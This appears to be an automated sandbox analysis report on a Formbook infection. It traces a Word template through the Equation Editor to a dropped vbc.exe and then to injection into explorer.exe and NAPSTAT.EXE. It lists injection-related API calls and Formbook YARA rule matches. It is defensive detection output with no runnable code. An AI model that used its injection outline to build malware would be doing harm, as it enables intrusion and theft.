          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0C40 NtGetContextThread,5_2_008E0C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E1D80 NtSuspendThread,5_2_008E1D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFD5C NtEnumerateKey,5_2_008DFD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFE24 NtWriteVirtualMemory,5_2_008DFE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFFFC NtCreateProcessEx,5_2_008DFFFC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFF34 NtQueueApcThread,5_2_008DFF34
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181C0 NtCreateFile,5_1_004181C0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418270 NtReadFile,5_1_00418270
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182F0 NtClose,5_1_004182F0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183A0 NtAllocateVirtualMemory,5_1_004183A0
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181BA NtCreateFile,5_1_004181BA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041826A NtReadFile,5_1_0041826A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182EB NtClose,5_1_004182EB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023400C4 NtCreateFile,LdrInitializeThunk,7_2_023400C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023407AC NtCreateMutant,LdrInitializeThunk,7_2_023407AC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_0233FAB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0233FAE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0233FAD0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0233FB68
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FB50 NtCreateKey,LdrInitializeThunk,7_2_0233FB50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0233FBB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F900 NtReadFile,LdrInitializeThunk,7_2_0233F900
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F9F0 NtClose,LdrInitializeThunk,7_2_0233F9F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0233FED0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FFB4 NtCreateSection,LdrInitializeThunk,7_2_0233FFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0233FC60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FD8C NtDelayExecution,LdrInitializeThunk,7_2_0233FD8C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0233FDC0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340078 NtResumeThread,7_2_02340078
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340060 NtQuerySection,7_2_02340060
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340048 NtProtectVirtualMemory,7_2_02340048
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023410D0 NtOpenProcessToken,7_2_023410D0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234010C NtOpenDirectoryObject,7_2_0234010C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341148 NtOpenThread,7_2_02341148
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023401D4 NtSetValueKey,7_2_023401D4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FA20 NtQueryInformationFile,7_2_0233FA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FA50 NtEnumerateValueKey,7_2_0233FA50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FBE8 NtQueryVirtualMemory,7_2_0233FBE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F8CC NtWaitForSingleObject,7_2_0233F8CC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341930 NtSetContextThread,7_2_02341930
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233F938 NtWriteFile,7_2_0233F938
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FE24 NtWriteVirtualMemory,7_2_0233FE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FEA0 NtReadVirtualMemory,7_2_0233FEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FF34 NtQueueApcThread,7_2_0233FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FFFC NtCreateProcessEx,7_2_0233FFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC30 NtOpenProcess,7_2_0233FC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02340C40 NtGetContextThread,7_2_02340C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC48 NtSetInformationFile,7_2_0233FC48
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FC90 NtUnmapViewOfSection,7_2_0233FC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0233FD5C NtEnumerateKey,7_2_0233FD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02341D80 NtSuspendThread,7_2_02341D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000981C0 NtCreateFile,7_2_000981C0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00098270 NtReadFile,7_2_00098270
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000982F0 NtClose,7_2_000982F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000983A0 NtAllocateVirtualMemory,7_2_000983A0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000981BA NtCreateFile,7_2_000981BA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009826A NtReadFile,7_2_0009826A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_000982EB NtClose,7_2_000982EB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023E05A4_2_0023E05A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022A1FB4_2_0022A1FB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0022A2004_2_0022A200
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023DA6F4_2_0023DA6F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023CAA24_2_0023CAA2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0023D2CF4_2_0023D2CF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002243274_2_00224327
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002243304_2_00224330
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002245504_2_00224550
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002225D04_2_002225D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002227144_2_00222714
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004011745_2_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CABA5_2_0041CABA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C5B5_2_00408C5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C605_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C4CF5_2_0041C4CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD5B5_2_0041BD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B5025_2_0041B502
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE0C65_2_008EE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D0055_2_0091D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090905A5_2_0090905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F30405_2_008F3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE2E95_2_008EE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009912385_2_00991238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EF3CF5_2_008EF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009163DB5_2_009163DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F23055_2_008F2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F73535_2_008F7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093A37B5_2_0093A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009254855_2_00925485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009014895_2_00901489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092D47D5_2_0092D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090C5F05_2_0090C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F351F5_2_008F351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009365405_2_00936540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F46805_2_008F4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FE6C15_2_008FE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009926225_2_00992622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097579A5_2_0097579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC7BC5_2_008FC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009257C35_2_009257C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098F8EE5_2_0098F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC85C5_2_008FC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091286D5_2_0091286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099098E5_2_0099098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F29B25_2_008F29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009069FE5_2_009069FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009759555_2_00975955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009A3A835_2_009A3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0099CBA45_2_0099CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097DBDA5_2_0097DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EFBD75_2_008EFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00917B005_2_00917B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098FDDD5_2_0098FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00920D3B5_2_00920D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FCD5B5_2_008FCD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00922E2F5_2_00922E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090EE4C5_2_0090EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00900F3F5_2_00900F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091DF7C5_2_0091DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004010305_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004011745_1_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CABA5_1_0041CABA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C5B5_1_00408C5B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C605_1_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C4CF5_1_0041C4CF
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BD5B5_1_0041BD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B5025_1_0041B502
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D875_1_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D905_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB05_1_00402FB0
          Source: C:\Windows\explorer.exeCode function: 6_2_029512FF6_2_029512FF
          Source: C:\Windows\explorer.exeCode function: 6_2_0294E8F96_2_0294E8F9
          Source: C:\Windows\explorer.exeCode function: 6_2_029530626_2_02953062
          Source: C:\Windows\explorer.exeCode function: 6_2_029555B26_2_029555B2
          Source: C:\Windows\explorer.exeCode function: 6_2_029547C76_2_029547C7
          Source: C:\Windows\explorer.exeCode function: 6_2_0294E9026_2_0294E902
          Source: C:\Windows\explorer.exeCode function: 6_2_029513026_2_02951302
          Source: C:\Windows\explorer.exeCode function: 6_2_0294F3626_2_0294F362
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023F12387_2_023F1238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234E2E97_2_0234E2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023523057_2_02352305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0239A37B7_2_0239A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023573537_2_02357353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023F63BF7_2_023F63BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023763DB7_2_023763DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234F3CF7_2_0234F3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0237D0057_2_0237D005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0236905A7_2_0236905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023530407_2_02353040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234E0C67_2_0234E0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0239A6347_2_0239A634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023F26227_2_023F2622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023546807_2_02354680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0235E6C17_2_0235E6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0235C7BC7_2_0235C7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023D579A7_2_023D579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023857C37_2_023857C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0238D47D7_2_0238D47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023854857_2_02385485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023614897_2_02361489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0235351F7_2_0235351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023965407_2_02396540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0236C5F07_2_0236C5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02403A837_2_02403A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02377B007_2_02377B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023FCBA47_2_023FCBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0234FBD77_2_0234FBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023DDBDA7_2_023DDBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0237286D7_2_0237286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0235C85C7_2_0235C85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023EF8EE7_2_023EF8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023D59557_2_023D5955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023529B27_2_023529B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023F098E7_2_023F098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023669FE7_2_023669FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02382E2F7_2_02382E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0236EE4C7_2_0236EE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02360F3F7_2_02360F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0237DF7C7_2_0237DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_02380D3B7_2_02380D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0235CD5B7_2_0235CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_023EFDDD7_2_023EFDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009C4CF7_2_0009C4CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009B5027_2_0009B502
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009CABA7_2_0009CABA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00088C5B7_2_00088C5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00088C607_2_00088C60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_0009BD2F7_2_0009BD2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00082D877_2_00082D87
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 7_2_00082FB07_2_00082FB0
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F70 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0095F970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0A0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008EE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00933F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008EDF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0234DF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 023BF970 appears 81 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02393F92 appears 108 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0239373B appears 238 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0234E2A8 appears 38 times
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOT@10/8@8/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$dot.dotJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
